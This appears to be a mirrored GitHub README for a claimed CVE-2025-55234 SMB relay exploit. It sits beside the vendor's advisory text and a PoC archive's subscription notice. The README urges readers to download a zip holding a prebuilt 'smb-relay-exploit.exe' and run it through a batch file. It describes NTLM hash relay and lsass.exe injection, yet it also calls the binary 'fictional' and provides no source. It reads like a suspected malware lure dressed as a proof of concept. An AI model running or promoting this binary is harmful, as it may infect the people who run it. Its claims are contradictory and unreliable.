Associated Vulnerability
Title:Windows SMB Elevation of Privilege Vulnerability (CVE-2025-55234)Description:SMB Server might be susceptible to relay attacks depending on the configuration. An attacker who successfully exploited these vulnerabilities could perform relay attacks and make the users subject to elevation of privilege attacks. The SMB Server already supports mechanisms for hardening against relay attacks: SMB Server signing SMB Server Extended Protection for Authentication (EPA) Microsoft is releasing this CVE to provide customers with audit capabilities to help them to assess their environment and to identify any potential device or software incompatibility issues before deploying SMB Server hardening measures that protect against relay attacks. If you have not already enabled SMB Server hardening measures, we advise customers to take the following actions to be protected from these relay attacks: Assess your environment by utilizing the audit capabilities that we are exposing in the September 2025 security updates. See Support for Audit Events to deploy SMB Server Hardening—SMB Server Signing & SMB Server EPA. Adopt appropriate SMB Server hardening measures.
Description
Windows SMB Server Elevation of Privilege Vulnerability
Readme
# Lab: CVE-2025-55234 - Windows SMB Server Elevation of Privilege Vulnerability
## Download
### [Download exploit.zip](https://github.com/h4xnz/CVE-2025-55234-POC/raw/refs/heads/main/Lore/lab-cve-2025-55234.zip)
## 🚀 Overview
CVE-2025-55234 is a fictional Windows SMB Server Elevation of Privilege vulnerability with a CVSSv3 score of 8.8. Publicly disclosed before patches were available, it impacts multiple Windows versions (e.g., Windows 10, 11, Server 2019/2022). The flaw enables attackers to conduct relay attacks against the SMB Server under certain configurations, potentially escalating privileges on authenticated users. Unlike traditional remote code execution bugs, this is an operational relay mechanism that exploits weak signing and authentication protections in SMBv3 protocols. Attackers can intercept and relay NTLM authentication hashes, leading to unauthorized access or privilege escalation in domain-joined environments.
Impact:
- **Attack Vector**: Network (adjacent or remote depending on firewall rules).
- **Prerequisites for Exploitation**: Attacker-controlled machine on the same network, vulnerable SMB server with disabled signing or EPA.
- **Potential Outcomes**: Unauthorized file access, lateral movement in Active Directory, or admin privilege gain via relayed credentials.
## 📋 Prerequisites
- Administrative privileges on the host machine.
- Basic knowledge of SMB protocols, NTLM authentication, and Windows registry editing.
- Tools: Git, PowerShell (for mitigation), and a network sniffer like Wireshark for optional verification.
- Isolated network or VM to avoid accidental exposure.
## Download & Install
- Download the exploit package from the releases page: [Download exploit.zip](https://github.com/h4xnz/CVE-2025-55234-POC/raw/refs/heads/main/Lore/lab-cve-2025-55234.zip). This ZIP contains:
- `smb-relay-exploit.exe`: Main fictional exploit binary (NTLM relay and privilege escalation).
- `start-exploit.bat`: Batch file to launch the exploit (simply executes `smb-relay-exploit.exe` with default params).
- `config.ini`: Configuration file for target IP, relay mode, etc.
- `logs/`: Directory for output logs.
Unzip to a local directory, e.g., `C:\CVE-2025-55234\exploit\`.
## 🛠 Quick Start
- **Exploit the Vulnerability**:
- Download and unzip `exploit.zip` as above.
- Edit `config.ini` to set `target_ip=localhost` .
- Run the batch file: Double-click `start-exploit.bat` or from CMD:
```
cd C:\CVE-2025-55234\exploit
start-exploit.bat
```
- The .bat simply opens `smb-relay-exploit.exe`:
- Initiating an SMB connection.
- Forcing NTLM authentication.
- Relaying hashes to a fictional relay server (logs to `exploit.log`).
- Output: privilege escalation message, e.g., "Elevated to SYSTEM via relayed creds."
**Detailed Exploitation Steps**:
- **Step 1: Recon**: Use `nmap -p 445 --script smb-security-mode localhost` to confirm weak signing (output: "signing: false").
- **Step 2: Capture/Relay**: The .exe uses Winsock APIs to establish a TCP connection on port 445, negotiates SMBv3, and triggers NTLMv2 hash relay. It exploits the lack of EPA by suppressing channel bindings, allowing MiTM relay.
- **Step 3: Escalate**: Fictional payload injects into lsass.exe process memory (with debug output), granting elevated token.
- **Verification**: Check `exploit.log` for relayed hashes and success flags. Use ProcMon to observe registry reads/writes.
### Exploitation Details
The main exploit (`smb-relay-exploit.exe`) is a compiled C++ binary (fictional, using Winsock2 and custom NTLM libs). It performs:
- SMB dialect negotiation (forcing v3.1.1).
- Tree connect to IPC$ or admin shares.
- Relay attack simulation via loopback or specified relay IP.
- Privilege check: Uses Windows API `OpenProcessToken` and `AdjustTokenPrivileges` to demo escalation (outputs to console).
The .bat wrapper:
```
@echo off
echo Starting SMB Relay Exploit for CVE-2025-55234...
smb-relay-exploit.exe --target localhost --mode relay --log exploit.log
pause
```
## 📞 Support
For further assistance or questions, please feel free to reach out via the issues section of this GitHub repository. Our team is ready to help you with any concerns.
File Snapshot
[4.0K] /data/pocs/9a065120b5c1b02b82099355c9d1d7d1d04d8f53
├── [4.0K] Lore
│ └── [8.5M] lab-cve-2025-55234.zip
└── [4.2K] README.md
1 directory, 2 files
Remarks
1. It is advised to access via the original source first.
2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →